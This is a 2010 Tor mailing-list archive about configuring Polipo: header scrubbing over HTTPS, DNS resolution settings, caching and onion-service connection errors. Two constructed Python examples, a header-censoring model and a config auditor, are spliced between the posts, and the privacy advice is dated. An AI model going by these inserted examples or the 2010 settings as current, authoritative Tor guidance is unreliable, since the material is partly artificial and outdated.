everywhere soon, I'm sure someone will write the shim
sooner or later.

 (Tahoe LAFS / encrypted $cloud storage for your

dig :)


Re: polipo

2010-08-21 Thread F. Fox
For the most part, anything involving HTTPS, needs to be taken care of 
in the browser itself. Properly-configured extensions help a lot here.


Also, that adds an extra layer of protection onto normal HTTP stuff, 
too. The more, the merrier...


F. Fox

On 8/21/10, Robert Ransom rransom.8...@gmail.com  wrote:
(snip)

As I understand it, Polipo can't scrub the headers of an HTTPS request,
even if you use it as an HTTPS proxy.


(snip)


Re: https proxy [was polipo]

2010-08-21 Thread grarpamp
   https://anonymous-proxy-servers.net/en/anontest
 As I understand it, Polipo can't scrub the headers of an HTTPS request,

Nothing in the open source field can do so yet afaik.

To do it, a shim needs to be coded and placed between the application and Tor.
user - browser - [optional tool] - shim - tor:9050

The shim needs to listen on a proxy port (and or two configurable
ports (for http and https)) and connect out to the world (or tor) to a
proxy port (socks) (and or
two other ports (for http and https or whatever port the input protocol used)).

It would pass http unmodified.
It would break end to end https. If the destination site had an invalid cert,
it would present an invalid self-generated one to the client. If the destination
site had a valid cert, it would present a self-generated and self-signed one to
the client (which had obviously included the shim's root as a trusted
cert), simply
to signify to the client as to validity. Identity would be available
from verbose
logging in the shim and via an http[s] port on the shim itself.

It could furthermore 'tee' off two output ports from its bottom and receive
two input ports from its top. These would be a more general hook into
'optional toolchains' located in between the client and server side,
decoding and shuffling the data stream in and out to a toolset at that point.

It should have no 'censoring', caching or other features.. as that is what
the optional toolsets do best.

Note that 'browser' could be anything that can speak http[s], not
just FF/MSIE. So 'plugins' are a non option.

And that the 'optional tool' might be squid or polipo or whatever.

And lastly, erasing your OS and other info from your headers makes you
stand out as an obvious eraser. It's better to use a dead common and up
to date os and browser and then mind your sessions properly.


Re: polipo

2010-08-20 Thread Juliusz Chroboczek
Trystero Lot lo...@callout.me writes:

 it seems the censoredHeaders not working for me.

It works for me.

 have anyone tried to use this and add useragent?

It's user-agent, not useragent.

  censoredHeaders = user-agent

Juliusz




Re: polipo

2010-08-20 Thread Trystero Lot
still the same. i uncommented and added user-agent

censoredHeaders = set-cookie, cookie, cookie2, from,accept-language, user-agent
censorReferer = true

my header is not clean and in fact shows my OS :(

tested using..
https://anonymous-proxy-servers.net/en/anontest


Re: polipo

2010-08-20 Thread Robert Ransom
On Sat, 21 Aug 2010 09:39:08 +0800
Trystero Lot lo...@callout.me wrote:

 still the same. i uncommented and added user-agent
 
 censoredHeaders = set-cookie, cookie, cookie2, from,accept-language, 
 user-agent
 censorReferer = true
 
 my header is not clean and in fact shows my OS :(
 
 tested using..
 https://anonymous-proxy-servers.net/en/anontest

As I understand it, Polipo can't scrub the headers of an HTTPS request,
even if you use it as an HTTPS proxy.


Robert Ransom
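Why the header censoring has nothing to act on for HTTPS, as an added example that is not part of the original thread and is not Polipo's code: a minimal model of a header-censoring proxy handling a plain HTTP request and a CONNECT tunnel. The `censoredHeaders` list is the one posted above; the requests, the `relay` function and the stand-in bytes for the TLS records are constructed.

```python
"""Added example: what a censoring HTTP proxy can and cannot rewrite."""

# censoredHeaders value as posted in the thread.
CENSORED = {"set-cookie", "cookie", "cookie2", "from",
            "accept-language", "user-agent"}


def split_head(stream):
    """Split the bytes a proxy receives into request line, headers, remainder."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, rest


def relay(stream, censored=CENSORED, censor_referer=True):
    """Model of the proxy: return what is removed and what reaches the origin."""
    request_line, headers, rest = split_head(stream)
    parts = request_line.split(" ")
    if parts[0].upper() == "CONNECT":
        # The proxy opens a TCP connection to host:port and then copies bytes
        # in both directions. The real request, with its User-Agent and
        # cookies, is inside the TLS records and is never parsed here.
        return {"mode": "tunnel", "target": parts[1],
                "removed": [], "to_origin": rest}
    drop = set(censored) | ({"referer"} if censor_referer else set())
    kept = [(n, v) for n, v in headers if n.lower() not in drop]
    removed = [n for n, _ in headers if n.lower() in drop]
    head = "\r\n".join([request_line] + ["%s: %s" % h for h in kept]) + "\r\n\r\n"
    return {"mode": "http", "target": parts[1],
            "removed": removed, "to_origin": head.encode("latin-1") + rest}


# Constructed plain-HTTP request as a browser would send it to the proxy.
HTTP_SAMPLE = (b"GET http://example.com/ HTTP/1.1\r\n"
               b"Host: example.com\r\n"
               b"User-Agent: ExampleBrowser/1.0 (ExampleOS)\r\n"
               b"Accept-Language: en-US\r\n"
               b"Cookie: id=123\r\n"
               b"Referer: http://example.org/\r\n\r\n")

# Constructed stand-in for TLS records; real ones would carry the encrypted
# GET request, headers included.
TLS_STANDIN = bytes.fromhex("160301000501020304")
HTTPS_SAMPLE = (b"CONNECT example.com:443 HTTP/1.1\r\n"
                b"Host: example.com:443\r\n\r\n") + TLS_STANDIN

if __name__ == "__main__":
    for name, sample in (("http", HTTP_SAMPLE), ("https", HTTPS_SAMPLE)):
        result = relay(sample)
        print(name, result["mode"], "removed:", result["removed"])
```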




Re: polipo

2010-08-20 Thread Trystero Lot
no wonder. so there's a downside with https :(
thanks guys.

On 8/21/10, Robert Ransom rransom.8...@gmail.com wrote:
 On Sat, 21 Aug 2010 09:39:08 +0800
 Trystero Lot lo...@callout.me wrote:

 still the same. i uncommented and added user-agent

 censoredHeaders = set-cookie, cookie, cookie2, from,accept-language,
 user-agent
 censorReferer = true

 my header is not clean and in fact shows my OS :(

 tested using..
 https://anonymous-proxy-servers.net/en/anontest

 As I understand it, Polipo can't scrub the headers of an HTTPS request,
 even if you use it as an HTTPS proxy.


 Robert Ransom



polipo

2010-08-19 Thread Trystero Lot
it seems the censoredHeaders not working for me. have anyone tried to
use this and add useragent?


Re: Polipo question

2010-05-08 Thread Juliusz Chroboczek
  does anyone know if there is a config file option to turn off all
  caching in Polipo?

If you look at the Polipo manual, there's an index.  If you look at the
index, there's an entry for uncachable.  If you follow the entry,
you'll find the config variable uncachableFile.

--jch


RE: Polipo question

2010-05-08 Thread downie -


 From: j...@pps.jussieu.fr
 To: or-talk@freehaven.net
 Subject: Re: Polipo question
 Date: Sat, 8 May 2010 18:08:22 +0200
 
   does anyone know if there is a config file option to turn off all
   caching in Polipo?
 
 If you look at the Polipo manual, there's an index.  If you look at the
 index, there's an entry for uncachable.  If you follow the entry,
 you'll find the config variable uncachableFile.
 
 --jch

Thank you, I have a recollection of reading that section and not really 
understanding it - I think I would need a good understanding of how caching 
works and all the directives first. From what I read, you have to know in 
advance which URLs you don't want cached, and put them in uncachableFile. 
That's not really practical. But thanks for trying to help.
GD
  

Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-12 Thread Matthew

 I'm not sure whether either of these bugs are fixed at present (ugh). So
 I'd recommend sticking with yes (or true, I guess it's called now).


If yes is the same as true then this is a setting the Polipo manual
strongly advises against. Finally, if dnsUseGethostbyname is true,
Polipo never tries to speak DNS itself and uses the system resolver straight away 
(this is not recommended).

 Given those, and since polipo shouldn't be doing any dns resolves anyway
 when it's using a socks5 proxy, I figured I'd go for the choice that
 exposed less surface area.

My fundamental question is this:

If the config file says yes to dnsUseGethostbyname then Tor does the
DNS resolution.
If however the config file says something else e.g. reluctantly (The
manual says if it is reluctantly (the default), Polipo tries to speak
DNS and falls back to the system resolver if a name server could not be
contacted.) then does Polipo do its own DNS resolution and then pass
this on to Tor therefore leaking?


Or, are you saying, that since polipo shouldn't be doing any dns 
resolves anyway when it's using a socks5 proxy the value of 
dnsUseGethostbyname is not relevant when using Polipo with Tor since Tor 
will ALWAYS do DNS resolution because of 
socksParentProxy = localhost:9050 and socksProxyType = socks5.


If yes then my first question is moot.

This is what is confusing me the most - whether changing 
dnsUseGethostbyname means Polipo (not Tor) now does the DNS resolution.




--Roger



Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-11 Thread andrew
On Thu, Apr 08, 2010 at 04:24:06PM +0100, pump...@cotse.net wrote 2.7K bytes in 
64 lines about:
 The standard Polipo configuration file for Ubuntu located at  
 https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf
  
 should replace the configuration file one downloads when Polipo is  

I believe you mean The standard polipo configuration file for safely
using Tor.  The standard ubuntu polipo config doesn't use Tor.

 this setting in the configuration file is not important? Or does Polipo  
 do the DNS resolution before traffic is passed on to Tor in which case  
 the configuration file is crucial? In other words, when is DNS resolved  
 when using Tor and Polipo?

In practice, with that config file, dns queries are passed to tor
directly for resolution, not being done by polipo nor the actual system
resolver.

If you change the options, you should see polipo query your local dns
resolver either directly, or via gethostbyname.

I agree the config needs more clarity and to match an actual option as
specified in the info page.  I'll add it as a bug to research.

This is also the case for TBB, not necessarily so for non-tbb use cases.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://www.torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-11 Thread Matthew

and...@torproject.org wrote:


In practice, with that config file, dns queries are passed to tor
directly for resolution, not being done by polipo nor the actual system
resolver.
  

Thank you for the confirmation.

If you change the options, you should see polipo query your local dns
resolver either directly, or via gethostbyname.

  
So, the option reluctantly for dnsUseGethostbyname would mean DNS 
requests are done by Tor and are only done by Polipo if Tor DNS fails or 
does it mean DNS requests are now done by Polipo usually and only done 
by the system resolver if Polipo DNS fails?


The manual says for reluctantly - Polipo tries to speak DNS and falls 
back to the system resolver if a name server
could not be contacted.  I am unclear where it tries to speak DNS - 
would this be before Tor or would the DNS still get pushed through Tor 
even though the configuration file has been modified?

I agree the config needs more clarity and to match an actual option as
specified in the info page.  I'll add it as a bug to research.
  
I am still confused regarding what yes actually means - does it refer 
to the default which is reluctantly or does it mean nothing to Polipo 
and is just ignored?  In which case why not just comment this option out?


Thank you for your help!


Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-11 Thread Matthew



If you change the options, you should see polipo query your local dns
resolver either directly, or via gethostbyname.

  
But if you change it to false would that not be the safest option - 
from what I can gather in this situation Polipo would never do its own DNS.



Re: Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-11 Thread Roger Dingledine
On Sun, Apr 11, 2010 at 11:14:31PM +0100, Matthew wrote:
 If you change the options, you should see polipo query your local dns
 resolver either directly, or via gethostbyname.

 But if you change it to false would that not be the safest option -  
 from what I can gather in this situation Polipo would never do its own 
 DNS.

As I understand it, the question is whether polipo should use the
system call named gethostbyname(), or if it should use its own internal
non-blocking dns resolve code. The question isn't should polipo disable
dns resolves or not.

Back when I picked the yes answer, there were two reasons:

A) polipo's internal dns resolve code didn't look at /etc/hosts,
so when I set my proxy to localhost:9050, polipo would try to resolve
localhost, and it ended up asking my ISP where localhost was. My ISP
helpfully answered 127.0.0.1, but what if my ISP had answered something
else? Really bad news.

B) There were some remote buffer overflows in polipo's internal dns
resolve code.

Given those, and since polipo shouldn't be doing any dns resolves anyway
when it's using a socks5 proxy, I figured I'd go for the choice that
exposed less surface area.

I'm not sure whether either of these bugs are fixed at present (ugh). So
I'd recommend sticking with yes (or true, I guess it's called now).

--Roger
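A configuration check built from the points in this thread, as an added example (not the Tor Project's or Polipo's code): it flags a `polipo.conf` with no `socksParentProxy`, a `dnsUseGethostbyname` value outside the four the manual lists as quoted in this thread, and a parent proxy given by name while Polipo's own resolver is in use (point A above). Treating `yes` like `true` follows Roger's remark and is an assumption; the finding codes and sample configs are constructed.

```python
"""Added example: audit a polipo.conf for the DNS concerns raised in this thread."""
import ipaddress

# The four values listed in section 3.9 of the Polipo manual, as quoted in the thread.
MANUAL_VALUES = {"false", "reluctantly", "happily", "true"}
# Assumption, from the remark "(or true, I guess it's called now)":
# "yes" behaves like "true", i.e. the system resolver is always used.
SYSTEM_RESOLVER_VALUES = {"true", "yes"}
SOCKS_TYPES = {"socks4a", "socks5"}


def parse_conf(text):
    """Return {variable: value} from 'name = value' lines, ignoring # comments."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        name, sep, value = line.partition("=")
        if sep:
            conf[name.strip()] = value.strip().strip('"')
    return conf


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def audit(text):
    """Return a list of (code, detail) findings for one config file."""
    conf = parse_conf(text)
    findings = []
    # "reluctantly" is the default according to the quoted manual text.
    dns_mode = conf.get("dnsUseGethostbyname", "reluctantly").lower()
    if dns_mode not in MANUAL_VALUES:
        findings.append(("UNDOCUMENTED_DNS_VALUE",
                         "dnsUseGethostbyname = %s is not one of %s"
                         % (dns_mode, sorted(MANUAL_VALUES))))
    parent = conf.get("socksParentProxy", "")
    if not parent:
        findings.append(("NO_SOCKS_PARENT",
                         "no socksParentProxy: Polipo resolves and connects itself"))
        return findings
    host = parent.rpartition(":")[0] or parent
    if not is_ip_literal(host) and dns_mode not in SYSTEM_RESOLVER_VALUES:
        # Point A: the internal resolver may ask an outside name server
        # where the proxy host (for example "localhost") is.
        findings.append(("PROXY_HOST_NEEDS_DNS",
                         "socksParentProxy host %r must be resolved with "
                         "dnsUseGethostbyname = %s" % (host, dns_mode)))
    proxy_type = conf.get("socksProxyType")
    if proxy_type is not None and proxy_type.lower() not in SOCKS_TYPES:
        findings.append(("UNKNOWN_SOCKS_TYPE", "socksProxyType = %s" % proxy_type))
    return findings


# Constructed sample: the lines quoted in this thread from the Tor polipo.conf.
TOR_CONF = """
# Uncomment this if you want to use a parent SOCKS proxy:
socksParentProxy = localhost:9050
socksProxyType = socks5
dnsUseGethostbyname = yes
"""

# Constructed sample: the same file with the DNS line commented out.
CHANGED_CONF = TOR_CONF.replace("dnsUseGethostbyname", "# dnsUseGethostbyname")

# Constructed sample: parent proxy given as an address, internal resolver only.
IP_CONF = """
socksParentProxy = 127.0.0.1:9050
socksProxyType = socks5
dnsUseGethostbyname = false
"""

if __name__ == "__main__":
    for label, text in (("tor", TOR_CONF), ("changed", CHANGED_CONF), ("ip", IP_CONF)):
        print(label, audit(text))
```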



Polipo and dnsUseGethostbyname - what is the best option and does it matter?

2010-04-08 Thread Matthew

Hello,

The standard Polipo configuration file for Ubuntu located at 
https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf 
should replace the configuration file one downloads when Polipo is 
installed according to http://www.torproject.org/docs/tor-doc-unix.html.en.


The Polipo configuration from 
https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf 
says:


# Uncomment this to disable Polipo's DNS resolver and use the system's
# default resolver instead. If you do that, Polipo will freeze during
# every DNS query:

dnsUseGethostbyname = yes

However, section 3.9 of the Polipo manual says:

Polipo usually tries to speak the DNS protocol itself rather than using
the system resolver. Its precise behaviour is controlled by the value of
dnsUseGethostbyname. If dnsUseGethostbyname is false, Polipo never uses
the system resolver. If it is reluctantly (the default), Polipo tries to
speak DNS and falls back to the system resolver if a name server could
not be contacted. If it is happily, Polipo tries to speak DNS, and falls
back to the system resolver if the host couldn’t be found for any reason
(this is not a good idea for shared proxies). Finally, if
dnsUseGethostbyname is true, Polipo never tries to speak DNS itself and
uses the system resolver straight away (this is not recommended).

Three questions:

First, since yes is not one of the four options listed in 3.9 what 
does this mean? I was using yes for many months without realizing it 
was not an option. How does Polipo use yes? Why is this in the config 
file?


Second, surely the best option is false. That way even if there is a 
problem with Polipo's DNS it will not use the local DNS as listed in 
resolv.conf. Some people might say: put OpenDNS in resolv.conf. However, 
I am on an academic network which does not permit me to modify the DNS; 
changing resolv.conf means I have no connection. (I know about the 
dnsNameServer option but let's leave that for now).


Third, I always use Polipo with Tor. Even if dnsUseGethostbyname is set 
to yes or any of the four valid options does this matter? Are DNS 
requests passed through Polipo to Tor and then Tor does its DNS 
resolution (after the final exit node if I understand correctly?) so 
this setting in the configuration file is not important? Or does Polipo 
do the DNS resolution before traffic is passed on to Tor in which case 
the configuration file is crucial? In other words, when is DNS resolved 
when using Tor and Polipo?


Thanks.




RE: Polipo question

2010-04-02 Thread downie -







 Subject: Re: Polipo question
 From: incoming.li...@ax11.de
 To: or-talk@freehaven.net
 Date: Thu, 1 Apr 2010 23:10:09 +0200
 
 Am Donnerstag, den 18.03.2010, 23:35 -0400 schrieb downie -:
  Hi,
   does anyone know if there is a config file option to turn off all
  caching in Polipo?
  I am having a problem with variable PHP pages being cached, and would
  prefer not to have to add Cache-Control headers everywhere. The manual
  doesn't seem to allow for that eventuality.
  downie
 
 Have you tried connecting to http://localhost:8123/polipo/config? (and
 setting CacheDir to /dev/null there if nothing else works) 
 
 Cheers,
 Tom

Hi,
Polipo is on port 8118 for Tor: anyhow, Firefox won't connect to localhost - 
it's 'restricted'.
Also disc caching is off already (critical for privacy), it's the memory cache 
that is still a problem.
downie
  

Re: Polipo question

2010-04-02 Thread Roger Dingledine
On Fri, Apr 02, 2010 at 12:56:25PM -0400, downie - wrote:
   I am having a problem with variable PHP pages being cached, and would
   prefer not to have to add Cache-Control headers everywhere. The manual
   doesn't seem to allow for that eventuality.

I believe the answer is that you can't turn off caching. It's core to
what polipo does. But perhaps Chris or Juliusz will contradict me.

 Polipo is on port 8118 for Tor: anyhow, Firefox won't connect to
localhost - it's 'restricted'.

My guess is that's actually Torbutton preventing you from reaching port
8118 or port 8123, not Firefox preventing you from reaching localhost.

http://kb.mozillazine.org/Network.security.ports.banned
https://www.torproject.org/torbutton/design/#browseroverlay

--Roger



Re: Polipo question

2010-04-01 Thread Hans Jemand Anders
Am Donnerstag, den 18.03.2010, 23:35 -0400 schrieb downie -:
 Hi,
  does anyone know if there is a config file option to turn off all
 caching in Polipo?
 I am having a problem with variable PHP pages being cached, and would
 prefer not to have to add Cache-Control headers everywhere. The manual
 doesn't seem to allow for that eventuality.
 downie

Have you tried connecting to http://localhost:8123/polipo/config? (and
setting CacheDir to /dev/null there if nothing else works) 

Cheers,
Tom




Polipo/Tor error messages, sdfetch, LEAK

2010-03-22 Thread grarpamp
I'm running some automated widgets that connect to various onions.

The breakdown of 702 Polipo connects across about as many onions
is:

a  85 ok
b   1 ERROR 504: Connect to onion failed: General SOCKS server failure.
c   9 ERROR 504: Connect to onion failed: SOCKS connection not allowed.
d  99 ERROR 504: Connect to onion failed: SOCKS error: TTL expired.
e   5 ERROR 504: Connect to onion failed: SOCKS error: connection refused.
f 503 ERROR 504: Connect to onion failed: SOCKS error: host unreachable.

The breakdown of approximately the same set of Tor connects is:

g 531 Closing stream for '[scrubbed].onion': hidden service is
unavailable (try again later).
h   1 Tried for 120 seconds to get a connection to [scrubbed]:LEAK. Giving up.
i   5 Tried for 120 seconds to get a connection to [scrubbed]:LEAK.
Giving up. (waiting for circuit)
j 250 Tried for 120 seconds to get a connection to [scrubbed]:LEAK.
Giving up. (waiting for rendezvous desc)

Note the port LEAK above can identify the onion if that onion is
using a unique port from most of the other onions. Anyways...


h) Tor should not give up without emitting a reason.

f and g) So this means there was no descriptor in the directories?
ie: blahblahblahblah.onion

b and c) I figure this is a local problem, maybe with the Polipo/Tor
connection.

d and i) Does this mean that the onion is there and up but something
in the path or the terminating service is broken?

e) Is the hidden service on the host up but the userland daemon
(httpd, etc) down?

j) This seems to be an actual Tor issue in getting a response from
the directories that could be fixed?

I've noticed that some of the other 504 types will change to
'unreachable' upon subsequent connection attempts. However that is
not always the case. Can the timeouts for the 'TTL' and 'waiting
for' issues be bumped?

Also, does anyone have an update to sdfetch that works with the
current stable or alpha trunks?


Re: Polipo question

2010-03-20 Thread andrew
On Thu, Mar 18, 2010 at 11:35:49PM -0400, downgeo...@hotmail.com wrote 1.8K 
bytes in 53 lines about:
:  does anyone know if there is a config file option to turn off all caching in 
Polipo?

I think you have to compile it without caching.  Have you tried setting
chunkhighmark and objecthighmark to 0?

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://www.torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


RE: Polipo question

2010-03-20 Thread downie -


 Date: Sat, 20 Mar 2010 10:52:28 -0400
 From: and...@torproject.org
 To: or-talk@freehaven.net
 Subject: Re: Polipo question
 
 On Thu, Mar 18, 2010 at 11:35:49PM -0400, downgeo...@hotmail.com wrote 1.8K 
 bytes in 53 lines about:
 :  does anyone know if there is a config file option to turn off all caching 
 in Polipo?
 
 I think you have to compile it without caching.  Have you tried setting
 chunkhighmark and objecthighmark to 0?
 


Thanks for the suggestion; I don't compile myself.
/Applications/Vidalia.app/Contents/Resources/polipo.conf:62: unknown config 
variable diskCacheRoot
/Applications/Vidalia.app/Contents/Resources/polipo.conf:71: unknown config 
variable localDocumentRoot
Impossibly low objectHighMark -- setting to 16

almost but not quite :-/ it's still caching small files at least.

  

Polipo question

2010-03-18 Thread downie -

Hi,
 does anyone know if there is a config file option to turn off all caching in 
Polipo?
I am having a problem with variable PHP pages being cached, and would prefer 
not to have to add Cache-Control headers everywhere. The manual doesn't seem to 
allow for that eventuality.
downie
  

Re: Polipo automatic?

2010-03-14 Thread zzzjethro666

 Thank you very much.

 


 

 

-Original Message-
From: downie - downgeo...@hotmail.com
To: Or-talk or-talk@freehaven.net
Sent: Sat, Mar 13, 2010 10:22 am
Subject: RE: Polipo automatic?


To: or-talk@freehaven.net
Subject: Polipo automatic?
Date: Fri, 12 Mar 2010 21:50:23 -0500
From: zzzjethro...@email2me.net


 Hi.
Just read a post made me think of this:
On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after 
starting Vidalia or do I have to start it separately? I think it's now Polipo 
rather than Privoxy for v 0.2.1.24-0.2.7?

thanks

 


Certainly with the OSX Vidalia bundle I downloaded, it was enabled already: 
it's an option in Vidalia/Control Panel/Settings.

downie
   

 


Polipo automatic?

2010-03-12 Thread zzzjethro666

 Hi.
Just read a post made me think of this:
On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after 
starting Vidalia or do I have to start it separately? I think it's now Polipo 
rather than Privoxy for v 0.2.1.24-0.2.7?

thanks

 




RE: Polipo automatic?

2010-03-12 Thread downie -

To: or-talk@freehaven.net
Subject: Polipo automatic?
Date: Fri, 12 Mar 2010 21:50:23 -0500
From: zzzjethro...@email2me.net


 Hi.

Just read a post made me think of this:

On Mac 10.5.2, with the Vidalia/Bundle, does Polipo automatically run after 
starting Vidalia or do I have to start it separately? I think it's now Polipo 
rather than Privoxy for v 0.2.1.24-0.2.7?



thanks



 




Certainly with the OSX Vidalia bundle I downloaded, it was enabled already: 
it's an option in Vidalia/Control Panel/Settings.

downie
  

Re: why polipo?

2010-02-20 Thread zzzjethro666

 

 How does one, or rather I, do this switch on my Mac 10.5.2 ppc?
Thanks and should I?


 

 

-Original Message-
From: Andrew Lewman and...@torproject.org
To: or-talk@freehaven.net
Sent: Sat, Feb 20, 2010 8:32 am
Subject: Re: why polipo?


On 02/15/2010 12:09 PM, Michael Gomboc wrote:
 Why is polipo used and no longer privoxy?

The first question is, why a http proxy at all?

The answer is, because Firefox SOCKS layer has hard-coded timeouts, and
other issues, https://bugzilla.mozilla.org/show_bug.cgi?id=280661.
Personally, I don't use an http proxy, I simply let my browser talk to
tor via socks directly.  The user experience sucks, because you'll
receive untold numbers of The connection has timed out warnings,
because firefox won't wait for Tor to build a circuit.  Chrome, Safari,
and Arora (amongst others) don't have this problem.

Once Firefox fixes bug 280661, we don't need a http proxy at all.
However, given the current pace of progress on 280661, we may switch to
Chrome before the fix occurs.

The second question is, why switch from privoxy to polipo?

Privoxy is fine filtering software that works well for what it is
intended to do.  However, its user experience is lacking due to it
lacking a few features, namely, http 1.1 pipelining, caching most
requested objects, and it needs to see the entire page to parse it,
before sending it on to the browser.  Lack of these three features is
the reason we switched from privoxy to polipo.

We've received plenty of feedback that browsing with polipo in place of
privoxy feels faster.  The feedback indicates that because polipo
streams the content to the browser for rendering nearly as fast as it
receives it from Tor, the user understands what's going on and will
start to read the web page as it loads.  Privoxy, necessarily, will load
the entire page, parse it for items to be filtered, and then send the
page on to the browser.  The user experience, especially on a slow
circuit, is that nothing happens, the browser activity icon spins
forever, and suddenly a page appears many, many seconds later.

If Tor was vastly faster, privoxy's mode of operation wouldn't matter.
We're working on making Tor faster.  However, purposely showing the user
how slow tor can be with privoxy was a huge point of complaint, and not
what we intended to do.

Does polipo have some bugs?  Sure.  Chrisd primarily, among others, is
working on fixing them.  At the current rate of progress on firefox bug
280661, we'll have polipo fixed before mozilla releases the SOCKS layer
fix.  Chrisd even wrote Mozilla a patch and submitted it on the bug.

The final point is that this is all free software.  You are in control.
 If you don't like polipo, but do like privoxy, then don't install
polipo and use privoxy.

The power of choice is yours.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/

 


Re: why polipo?

2010-02-20 Thread Michael Gomboc
Thank you Andrew for the nice explication!






-- 
Michael Gomboc
www.viajando.at
pgp-id: 0x5D41FDF8


Re: why polipo?

2010-02-20 Thread Flamsmark
On 19 February 2010 20:32, Andrew Lewman and...@torproject.org wrote:

 Once Firefox fixes bug 280661, we don't need a http proxy at all.
 However, given the current pace of progress on 280661, we may switch to
 Chrome before the fix occurs.


If the switch to Chrome was made, I assume that there'd be a port of the
TorButton extension to Chrome? If that does happen, a nice feature for the
Tor/!Tor switch would be to have Tor used only in incognito mode. I'm not
sure how you make extensions work in incognito mode, but I'm sure that I'm
not alone in wanting this feature.


Re: why polipo?

2010-02-20 Thread Andrew Lewman
On 02/20/2010 03:36 AM, zzzjethro...@email2me.net wrote:
  How does one, or rather I, do this switch on my Mac 10.5.2 ppc?
 Thanks and should I?

Should you switch?  I cannot answer that.

How to switch?  I can answer that at a high-level.

Install privoxy from http://www.privoxy.org/, reconfigure Vidalia to not
start a http proxy, and configure privoxy to point at tor as a socks server.

Search engines should be able to find you many walkthroughs in far
greater detail than that.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


Re: why polipo?

2010-02-20 Thread Marco Bonetti
Andrew Lewman wrote:
 Chrisd even wrote Mozilla a patch and submitted it on the bug.
cool, do you apply the patch to windows tor bundles? if not, it could be
worth to be applied :)
on the other side, I've mixed feelings regarding the possible switch
from firefox to chrome or any other browser but if this will help
spreading Tor, I'll more than gladly welcome it

-- 
Marco Bonetti
Tor research and other stuff: http://sid77.slackware.it/
Slackintosh Linux Project Developer: http://workaround.ch/
Linux-live for powerpc: http://workaround.ch/pub/rsync/mb/linux-live/

My GnuPG key id: 0x0B60BC5F


Re: why polipo?

2010-02-20 Thread Andrew Lewman
On 02/20/2010 12:38 PM, Flamsmark wrote:
 Once Firefox fixes bug 280661, we don't need a http proxy at all.
 However, given the current pace of progress on 280661, we may switch to
 Chrome before the fix occurs.
 If the switch to Chrome was made, I assume that there'd be a port of the
 TorButton extension to Chrome? If that does happen, a nice feature for the
 Tor/!Tor switch would be to have Tor used only in incognito mode. I'm not
 sure how you make extensions work in incognito mode, but I'm sure that I'm
 not alone in wanting this feature.
 

I should clarify that by Chrome, I really mean Chromium, the free and
open source version of Chrome; http://code.google.com/chromium/.

We'd like to stop eviscerating Firefox with Torbutton.  Rather, we could
integrate torbutton functionality into private/incognito browsing mode.
 Chromium is relatively new, and we're working with the team to
implement the APIs necessary for integration of a truly anonymous/private
browsing mode.

We'd also like to work with Mozilla on the same pathway, but so far we
haven't made the right connections in the organization to have this happen.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject



Re: why polipo?

2010-02-20 Thread Andrew Lewman
On 02/20/2010 03:58 PM, Marco Bonetti wrote:
 Andrew Lewman wrote:
 Chrisd even wrote Mozilla a patch and submitted it on the bug.
 cool, do you apply the patch to windows tor bundles? if not, it could be
 worth to be applied :)

No, we don't build our own Firefox yet.  I've been resisting adding
Tor's firefox to the list of software we maintain and build every
release.  However, yes it may become worthwhile to build our own
Firefox, and integrate Chrisd's patch.

 on the other side, I've mixed feelings regarding the possible switch
 from firefox to chrome or any other browser but if this will help
 spreading Tor, I'll more than gladly welcome it

I have mixed feelings as well.   Chromium/chrome has a nice sandboxing
model, is very fast at rendering, and in general is a nice browser.
It's new enough that by implementing some APIs for us, we can integrate
torbutton functionality into it far easier than the current reverse
engineering we have to do with firefox.

Alternatives could be like torfox and torora, where you just build the
browser from the start with Tor in mind.

-- 
Andrew Lewman
The Tor Project
pgp 0x31B0974B

Website: https://torproject.org/
Blog: https://blog.torproject.org/
Identi.ca: torproject


Re: why polipo?

2010-02-20 Thread Rich Jones
Dealing with Chromium devs on incognito integration is a great idea.

While we're discussing the bundle, I'd like to mention something
that's been on my mind lately. I recently ran a Privacy Tech Workshop
at the Students for Free Culture conference in DC - and the general
conclusion is that Tor/FF is too hard to use and set up  (and I think
that this has been the conclusion from the folks at the
OpenNetInitiative at Harvard about the real-world usage of censorship
resisting tools in Iran and such) and that most people end up using
the first result on whatever search engine for get around blocked
internet, etc, which ends up using a webproxy.

So - Tor needs to be easier to use.  The solution that we decided we'd
like to see is a stand-alone Tor client - essentially a version of FF
with Tor natively, invisibly integrated without any long-standing
background services (a single executable to launch all of the
necessary components and close them down when the browser quits). This
could be published as SafeBrowser or something obvious like that. As a
group we decided we'd like to work on producing that, although I don't
have much free time in the next few weeks and already have numerous
projects on my plate. Still, I do plan on following up with that, just
thought you might be interested in the idea.

Rich
http://www.anomos.info



Re: why polipo?

2010-02-20 Thread Andrew Lewman
On 02/20/2010 04:41 PM, Rich Jones wrote:
 While we're discussing the bundle, I'd like to mention something
 that's been on my mind lately. I recently ran a Privacy Tech Workshop
